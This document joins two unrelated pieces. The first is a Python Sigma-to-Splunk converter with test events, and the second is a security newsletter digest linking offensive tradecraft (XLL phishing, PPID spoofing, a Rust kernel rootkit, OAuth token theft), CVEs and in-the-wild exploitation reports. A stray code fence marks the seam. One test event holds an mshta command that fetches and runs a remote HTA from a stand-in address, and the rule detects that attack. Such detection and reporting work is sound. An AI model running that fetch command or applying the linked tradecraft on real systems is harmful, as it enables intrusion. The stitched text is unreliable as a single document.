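import re
from typing import Any, Dict, Iterator, List, Tuple

# Sigma rule as the dict PyYAML would yield for it; the filter is a hypothetical allowlist.
RULE = {
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {"ParentImage|endswith": "\\excel.exe",
                      "Image|endswith": ["\\mshta.exe", "\\powershell.exe"]},
        "filter": {"CommandLine|contains": "legit-updater"},
        "condition": "selection and not filter",
    },
}
# Assumed logsource prefix (pySigma derives this from a processing pipeline; the table is ours).
LOGSOURCE_PREFIX = {("process_creation", "windows"):
                    'source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1'}

def tokenize(condition: str) -> List[str]:
    return re.findall(r"\(|\)|\w+", condition)

def _fields(sel: Dict[str, Any]) -> Iterator[Tuple[str, str, List[str]]]:
    for key, value in sel.items():                # "Field|modifier": value or [values]
        field, _, modifier = key.partition("|")
        yield field, modifier, [str(v) for v in (value if isinstance(value, list) else [value])]

def _render_value(modifier: str, value: str) -> str:
    v = value.replace("\\", "\\\\").replace('"', '\\"')   # Splunk quoted-string escaping
    return {"contains": f"*{v}*", "startswith": f"{v}*", "endswith": f"*{v}"}.get(modifier, v)

def _render_selection(sel: Dict[str, Any]) -> str:
    parts = []
    for field, modifier, values in _fields(sel):     # list values OR together, fields AND together
        terms = [f'{field}="{_render_value(modifier, v)}"' for v in values]
        parts.append(terms[0] if len(terms) == 1 else "(" + " OR ".join(terms) + ")")
    return " AND ".join(parts)

def to_splunk(rule: Dict[str, Any]) -> str:
    det, out = rule["detection"], []
    for tok in tokenize(det["condition"]):
        if tok in ("and", "or", "not"):
            out.append(tok.upper())
        elif tok in ("(", ")"):
            out.append(tok)
        elif tok in det:
            out.append("(" + _render_selection(det[tok]) + ")")
        else:
            raise ValueError(f"unsupported condition token: {tok}")   # e.g. "1 of selection*"
    ls = rule.get("logsource", {})
    prefix = LOGSOURCE_PREFIX.get((ls.get("category"), ls.get("product")), "")
    return (prefix + " " + " ".join(out)).strip()

def _value_matches(modifier: str, expected: str, actual: str) -> bool:
    e, a = expected.lower(), actual.lower()       # Sigma string matching is case-insensitive
    return {"contains": e in a, "startswith": a.startswith(e), "endswith": a.endswith(e)}.get(modifier, a == e)

def _selection_matches(sel: Dict[str, Any], event: Dict[str, Any]) -> bool:
    return all(any(_value_matches(mod, v, str(event.get(field, ""))) for v in values)
               for field, mod, values in _fields(sel))

def evaluate_condition(tokens: List[str], truth: Dict[str, bool]) -> bool:
    pos = 0                                       # recursive descent; not binds tightest, then and, then or

    def factor() -> bool:
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        if tok == "not":
            return not factor()
        if tok == "(":
            inner = binary(0)
            pos += 1                              # consume ")"
            return inner
        return truth[tok]

    def binary(level: int) -> bool:               # level 0 = or-chain, level 1 = and-chain
        nonlocal pos
        op, below = ("or", lambda: binary(1)) if level == 0 else ("and", factor)
        left = below()
        while pos < len(tokens) and tokens[pos] == op:
            pos += 1
            right = below()                       # evaluate unconditionally so pos advances
            left = (left or right) if op == "or" else (left and right)
        return left

    result = binary(0)
    if pos != len(tokens):
        raise ValueError("malformed condition")
    return result

def matches(rule: Dict[str, Any], event: Dict[str, Any]) -> bool:
    det = rule["detection"]
    truth = {k: _selection_matches(v, event) for k, v in det.items() if k != "condition"}
    return evaluate_condition(tokenize(det["condition"]), truth)

# Constructed Sysmon-style process creation events (203.0.113.10 is a documentation address).
EXCEL = "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
SYS32 = "C:\\Windows\\System32\\"
EVENTS = [
    dict(ParentImage=EXCEL, Image=SYS32 + "mshta.exe", CommandLine="mshta http://203.0.113.10/p.htm"),
    dict(ParentImage="C:\\Windows\\explorer.exe", Image=SYS32 + "mshta.exe", CommandLine="mshta x.hta"),
    dict(ParentImage=EXCEL, Image=SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
         CommandLine="powershell -File legit-updater.ps1"),
]
```

Calling to_splunk(RULE) gives the search string with the prefix, the selection ANDed and the filter negated; running matches(RULE, e) over EVENTS fires only on the first event (Excel spawning mshta), not on explorer.exe spawning mshta and not on the allowlisted PowerShell command. The deliberately unsupported tokens (the "1 of selection*" family, aggregations) are exactly where a real converter like pySigma earns its keep.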

UNSW-NB15: a comprehensive data set for network intrusion detection systems

To train those machines or make IDS bleed..

UNSW-NB15 is a network intrusion dataset. It contains nine different attacks, includes DoS, worms, Backdoors, and Fuzzers. The dataset contains raw network packets. The number of records in the training set is 175,341 records and the testing set is 82,332 records from the different types, attack and normal.

https://paperswithcode.com/dataset/unsw-nb15

A STIX 2.1 Extension Definition for the Course of Action (COA) object type

You can see the potential value in this, but also wonder if it is too complex / risky to really use. I do however hope COA or similar grow as if shared they are really valuable to less capable blueteams.

This repository includes a STIX 2.1 nested property extension that augments the Course of Action (COA) STIX Domain Object (SDO) type to enable describing, embedding, storing, and sharing machine-readable security playbooks and orchestration workflows.

https://github.com/fovea-research/stix2.1-coa-playbook-extension

Offense

Attack capability, techniques and tradecraft.

Microsoft Office XLL Phishing Tradecraft

Alex Reid outlines how XLL files can be used in phishing campaigns. We have seen a number of commercial Red Teams use these.

With Microsoft's recent announcement regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have begun aggressively exploring other options to achieve user driven access (UDA).

XLLs are DLLs, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal Excel documents.

https://github.com/Octoberfest7/XLL_Phishing

PPID Spoofing & BlockDLLs with NtCreateUserProcess

Rasta Mouse provides minimal code that avoids CreateProcess and yet still achieves Parent Process ID (PPID) spoofing.

This week, Capt. Meelo released a great blog post on how to call the NtCreateUserProcess API as a substitute for the typical Win32 CreateProcess API. This post will build upon Meelo’s, so I highly encourage you to read it first.

https://offensivedefence.co.uk/posts/ntcreateuserprocess/

Windows Kernel Driver in Rust aka Rusty Rootkit for Red Teamers

From New Zealand with love..

Features (Development in progress)

  • Protect / unprotect process (Done)

  • Elevate / remove token privileges (Done)

  • Hide process (Done)

  • Hide driver (Done)

  • Enumerate loaded kernel modules (Done)

  • Enumerate / remove kernel callbacks

    • PsSetCreateProcessNotifyRoutine (Done)

    • PsSetCreateThreadNotifyRoutine (Todo)

    • PsSetLoadImageNotifyRoutine (Todo)

    • CmRegisterCallbackEx (Todo)

    • ObRegisterCallbacks (Todo)

  • DSE enable/disable (Done)

https://github.com/memN0ps/eagle-rs/

Stealing Google Drive OAuth tokens from Dropbox

A now patched bug, but a chain with a serious impact..

Sreeram KL and I were able to chain a harmless CSRF and SSRF in HelloSign to leak Google Drive OAuth tokens of Dropbox users.

https://blog.stazot.com/stealing-google-drive-oauth-tokens-from-dropbox/

Vulnerability

Our attack surface.

CVE-2022-22972: VMware Workspace ONE Access, Identity Manager and vRealize Automation updates address multiple vulnerabilities

Sob..

A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.

https://www.vmware.com/security/advisories/VMSA-2022-0014.html

CVE-2022-29383: NETGEAR ProSafe SSL VPN SQL injection vulnerability exists in scgi-bin/platform.cgi

Yes, and found with sqlmap..

https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383

Security Notice: SMA 1000 Series Unauthenticated Access Control Bypass

The SonicWall Product Security & Incident Response Team (PSIRT) has verified and patched the following vulnerabilities that impact Secure Mobile Access (SMA) 1000 series products (see product list and impacted firmware versions below).

  1. Unauthenticated access control bypass

  2. Use of hard-coded/shared cryptographic key

  3. URL redirection to an untrusted site (open redirection)

https://www.sonicwall.com/support/product-notification/security-notice-sma-1000-series-unauthenticated-access-control-bypass/220510172939820/

Exploitation

What is being exploited.

Lazarus Group (NukeSped) Exploiting Log4Shell Vulnerability

Korean reporting on North Korea using Log4Shell (log4j) against VMware Horizon to deploy an infostealer and more.

https://asec.ahnlab.com/ko/34107/

Observed in the Wild: F5 BIG-IP CVE-2022-1388

We expected it and now it is happening.. who and for what purpose will become evident in the fullness of time.

  • As of 14-May-22, GreyNoise has observed 173 unique IP addresses attempting to exploit the F5 BIG-IP iControl REST Authentication bypass vulnerability in the wild.

  • Observed exploit techniques include a large number of file requests, credential stuffing, and admin user creation. 

  • Download the latest list of IPs trying to exploit this vulnerability here, for use in analysis and temporary blocking

https://www.greynoise.io/blog/observed-in-the-wild-f5-big-ip-cve-2022-1388

Exploiting Cisco RV340 router at Pwn2Own Austin 2021

If there were any left unpatched, they will be compromised pretty soon..

At the 2021 Pwn2Own Austin, our offensive research team, Team Orca, successfully exploited the Cisco RV340 router. In this article, we will go into the details of the vulnerabilities we identified.

https://blog.security.sea.com/posts/pwn2own-2021-rv340/

Android 0-Day attacks

Clement Lecigne and Christian Resell detail three in-the-wild campaigns against Android. It shows that such chains exist and that some are sold.

The first campaign, detected in August 2021, used Chrome on a Samsung Galaxy S21 and the web server immediately replied with a HTTP redirect (302) pointing to the following intent URL. This URL abused a logic flaw and forced Chrome to load another URL in the Samsung Browser without user interaction or warnings.

We assess with high confidence this vulnerability was sold by an exploit broker and probably abused by more than one surveillance vendor.

..

In September 2021, TAG detected a campaign where the exploit chain was delivered to a fully up-to-date Samsung Galaxy S10 running the latest version of Chrome. We recovered the exploit used to escape the Chrome Sandbox, but not the initial RCE exploit.

..

In October 2021, we detected a full chain exploit from an up-to-date Samsung phone running the latest version of Chrome.

The chain included two 0-day exploits:

  • CVE-2021-38003: A Chrome renderer 0-day in JSON.stringify allowing the attacker to leak TheHole value and fully compromise the renderer.

  • CVE-2021-1048: Unlike the previous campaign, the sandbox escape used a Linux kernel bug in the epoll() system call. This system call is reachable from the BPF sandbox and allows the attacker to escape the sandbox and compromise the system by injecting code into privileged processes. More information can be found in this RCA by Jann Horn.

https://blog.google/threat-analysis-group/protecting-android-users-from-0-day-attacks/

Footnotes

Some other small bits and bobs which might be of interest.

  • New ransomware trends in 2022

  • A Tale of Two Markets: Investigating the Ransomware Payments Economy

  • SBOM + SLSA: Accelerating SBOM success with the help of SLSA

  • Software Updates Strategies: a Quantitative Evaluation against Advanced Persistent Threats

  • Call for Papers: 2022 FIRST Cyber Threat Intelligence Symposium

  • Artificial Intelligence and Cybersecurity - CEPS (a leading think tank and forum for debate on EU affairs) launched a Task Force on Artificial Intelligence and Cybersecurity in the autumn of 2019, to consider the technical, ethical, market and governance challenges posed by the intersection of AI and cybersecurity.

  • In hot pursuit of ‘cryware’: Defending hot wallets from attacks - worst marketing-invented threat name..

That’s all folks.. until next week..

© 2023 Ollie Whitehouse from BinaryFirefly